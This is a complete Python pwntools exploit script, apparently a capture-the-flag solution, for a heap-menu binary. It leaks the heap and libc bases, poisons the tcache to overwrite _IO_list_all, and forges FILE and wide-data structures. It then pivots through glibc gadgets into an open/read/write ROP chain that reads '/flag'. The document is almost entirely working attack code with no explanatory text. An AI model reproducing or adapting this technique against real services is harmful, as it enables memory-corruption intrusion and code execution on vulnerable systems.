1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174
| from pwn import * from pwn import u64,u32,p64,p32 from ctypes import * from libcfind import * from LibcSearcher import * import base64 import sys context(os='linux', arch='amd64', log_level='debug') context.terminal = ["tmux", "splitw", "-h"] debug = 1 if debug: p = process('./pwn') elf = ELF('./pwn') else: p = remote('10.213.13.228', 17846) elf = ELF('./pwn')
s = lambda data: p.send(data) sa = lambda text, data: p.sendafter(text, data) sl = lambda data: p.sendline(data) sla = lambda text, data: p.sendlineafter(text, data) r = lambda num=4096: p.recv(num) rl = lambda text: p.recvuntil(text) pr = lambda num=4096: sys.stdout.write(p.recv(num).decode()) inter = lambda: p.interactive() l32 = lambda: u32(p.recvuntil(b'\xf7')[-4:].ljust(4, b'\x00')) l64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) uu32 = lambda: u32(p.recv(4).ljust(4, b'\x00')) uu64 = lambda: u64(p.recv(6).ljust(8, b'\x00')) int16 = lambda data: int(data, 16) lg = lambda s, num: p.success('%s -> 0x%x' % (s, num))
libc = ELF('./libc.so.6') def add(index,size,data): rl(b">>> ") sl(b'1') rl(b"please input chunk_idx: ") sl(str(index)) rl(b"Enter chunk size: ") sl(str(size)) rl(b"Enter chunk data: ") s(data) def show(index): rl(b">>> ") sl(b'3') rl(b"Enter chunk id: ") sl(str(index)) def delete(index): rl(b">>> ") sl(b'2') rl(b"Enter chunk id: ") sl(str(index)) def exit(): rl(b">>> ") sl(b'4')
for i in range(8): add(i,0x10,'a') for i in range(9): add(i,0x60,'aa') for i in range(6): add(i,0x70,'a') add(0,0x40,'a')
add(0,0x10,'a') delete(0) add(1,0x10,p64(0x30)+p64(1)) show(0) r(16) heap_leak = uu64() lg("heap_leak",heap_leak) heap_key = (heap_leak >> 12) lg("heap_key",heap_key) heap_base = heap_key << 12 lg("heap_base",heap_base)
for i in range(10): add(i,0x80,'a')
add(8,0x10,'a') for i in range(8): delete(i) for i in range(7): add(i,0x80,'a')
delete(8) add(10,0x18,p64(0x20)+p64(0x1)+p64(heap_base+0xc70)) show(8)
libc_leak = uu64() lg("libc_leak",libc_leak) libc_base = libc_leak-0x21ace0 lg("libc_base",libc_base)
IO_list_all = libc_base + libc.sym['_IO_list_all'] lg("_IO_list_all",IO_list_all) stdout = libc_base + libc.sym['_IO_2_1_stdout_'] lg("stdout",stdout) IO_wfile_jumps = libc_base + 0x2170c0 lg("IO_wfile_jumps",IO_wfile_jumps) setcontext = libc_base+libc.sym['setcontext'] lg("setcontext",setcontext) ret = 0x0000000000029139 + libc_base pop_rdi = 0x000000000002a3e5 + libc_base pop_rsi = 0x000000000002be51 + libc_base pop_rdx_r12 = 0x000000000011f2e7 + libc_base pop_rbp = 0x000000000002a2e0 + libc_base open = libc_base + libc.sym['open'] read = libc_base + libc.sym['read'] write = libc_base + libc.sym['write'] leave_ret = libc_base + 0x000000000004da83 magic_gadget = libc_base + 0x16a06a lg("magic_gadget",magic_gadget) IO_jump_t = libc_base + 0x2170c0 lg("IO_jump_t",IO_jump_t) IO_list_all = libc_base + libc.sym['_IO_list_all'] lg("IO_list_all",IO_list_all) add(0,0x70,'a') for i in range(10): add(i,0x40,'a') add(10,0x10,'a') delete(10) add(11,0x18,p64(0x30)+p64(1)+p64(heap_base+0x11d0)) for i in range(9): delete(i) delete(10) for i in range(7): add(i,0x40,'a') for i in range(7): add(i,0x80,'a') for i in range(8): delete(i)
''' <svcudp_reply+26>: mov rbp,QWORD PTR [rdi+0x48] <svcudp_reply+30>: mov rax,QWORD PTR [rbp+0x18] <svcudp_reply+34>: lea r13,[rbp+0x10] <svcudp_reply+38>: mov DWORD PTR [rbp+0x10],0x0 <svcudp_reply+45>: mov rdi,r13 <svcudp_reply+48>: call QWORD PTR [rax+0x28] '''
orw1 = b'/flag\x00\x00\x00' orw1 += p64(pop_rdx_r12) + p64(heap_base+0x1720) + p64(heap_base+0x1520) + p64(pop_rdi) + p64(heap_base+0x1720) + p64(pop_rsi) + p64(0) + p64(open) + p64(pop_rbp) + p64(heap_base+0x1458) + p64(leave_ret) add(0,0x80,orw1)
fake_file = p64(0) fake_file += p64(0)*4 + p64(1) fake_file += p64(0) + p64(leave_ret) + p64(heap_base+0x1520) + p64(heap_base+0x1720) + p64(heap_base+0x1728) fake_file = fake_file.ljust(0x68,b'\x00') fake_file += p64(stdout) fake_file = fake_file.ljust(0x80,b'\x00') fake_file = bytes(fake_file)
fake_wide2 = p64(0)*6 + p64(heap_base+0x1640) + p64(magic_gadget)
add(1,0x80,fake_wide2) add(2,0x80,p64(0)*5+p64(IO_jump_t)+p64(0)*10) add(3,0x80,fake_file)
add(4,0x40,p64(IO_list_all^((heap_base+0x1100) >> 12))) add(5,0x40,'a') add(6,0x40,'a') add(7,0x40,p64(heap_base+0x1510))
orw2 = p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(heap_base+0x1000) + p64(pop_rdx_r12) + p64(0x50) + p64(0) + p64(read) orw2 += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(heap_base+0x1000) + p64(pop_rdx_r12) + p64(0x50) + p64(0) + p64(write)
add(8,0x80,orw2) exit()
inter()
|